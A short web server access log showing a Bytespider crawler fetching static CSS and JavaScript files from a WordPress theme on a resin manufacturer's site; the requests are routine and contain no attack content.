47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/icofont.css HTTP/2.0" 200 112247 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/media.css HTTP/2.0" 200 2502 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/animate.css HTTP/2.0" 200 69727 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:49:27 +0530] "GET /wp-content/themes/sk/js/index.js HTTP/2.0" 200 7070 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:49:27 +0530] "GET /wp-content/themes/sk/js/bootstrap.js HTTP/2.0" 200 74263 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
